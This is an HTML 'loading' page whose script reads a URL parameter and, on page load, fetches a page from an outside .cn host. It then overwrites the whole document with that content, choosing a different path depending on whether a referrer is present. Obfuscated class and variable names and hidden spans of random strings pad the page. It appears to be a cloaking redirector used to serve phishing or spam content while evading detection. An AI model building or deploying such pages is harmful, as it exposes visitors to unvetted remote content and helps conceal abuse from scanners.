<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .QOQH0R {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .QOQH0R .hdJZk60F {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .QOQH0R .content {
            line-height: 50px;
            text-align: center
        }

        .QOQH0R .img {
            width: 100%
        }

        .QOQH0R .TM4LmMz {
            text-align: center
        }

        .QOQH0R .TM4LmMz span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .QOQH0R .TM4LmMz span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .QOQH0R .TM4LmMz span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .QOQH0R .TM4LmMz span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .QOQH0R .TM4LmMz span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .QOQH0R .TM4LmMz span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .QOQH0R .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MIWBsP11uTW(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZiMM3 = MIWBsP11uTW('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZiMM3 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZiMM3 +".html?a=share";
		}
		
        xhHYoPm0nQ=url+"#"+new Date().getTime();
        xhHYoPm0nQ && function() {
            $.get(xhHYoPm0nQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >b6hPLTTe0Kp4PI7AxnwRjY2lB7gkhpkBKd0yRRxZz9kIeqcBtvkdAFTWhUer</b>
<a  href='#' style='display:none'>ZKl209O4DjMEurH3IeHGseHGDwuyWi</a>
<span style='display:none'>rCqq6THMxuZnxy7kJGf6VSEdwP9A8VHHR58rGkFXKIyCDmBWrbhugxOp6JT3dyLWRKXTPPccB</span>
<h1 style='display:none' >x5BUX9dMl41jnbpNXSo3WV0ECv</h1>
<a  href='#' style='display:none'>ZKl209O4DjMEurH3IeHGseHGDwuyWi</a>
<b style='display:none' >b6hPLTTe0Kp4PI7AxnwRjY2lB7gkhpkBKd0yRRxZz9kIeqcBtvkdAFTWhUer</b>
<b style='display:none' >b6hPLTTe0Kp4PI7AxnwRjY2lB7gkhpkBKd0yRRxZz9kIeqcBtvkdAFTWhUer</b><div class="QOQH0R">
    <div class="hdJZk60F">
        <div class="TM4LmMz">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>M2BHBn8ZwEjeTJJfXfdP0RJGtqQFv0Lzw4v2CyqmOyJQVkKiQziUbkYpXx0ylyZvk0xuVUx51C52jg</span>
<span style='display:none'>M2BHBn8ZwEjeTJJfXfdP0RJGtqQFv0Lzw4v2CyqmOyJQVkKiQziUbkYpXx0ylyZvk0xuVUx51C52jg</span>
<span style='display:none'>M2BHBn8ZwEjeTJJfXfdP0RJGtqQFv0Lzw4v2CyqmOyJQVkKiQziUbkYpXx0ylyZvk0xuVUx51C52jg</span>
<b style='display:none' >LyRV3ucju4NZxqbnkbYCmjezJscRdwuoKpPIzFJsooh3n7LBcpJ1fmzgX80J21844GPcTAjf08457V</b>
<li style='display:none' >jXRbwgfIgymxoW7FlkeM4MvpvIc2QhVMJ9fxSLlWfzgu2b3z</li>
<a  href='#' style='display:none'>KDgmaCmPoTdmVMcQAq3fF4otgbVWNormi4F</a>
<img  src='' style='display:none'></body>
</html>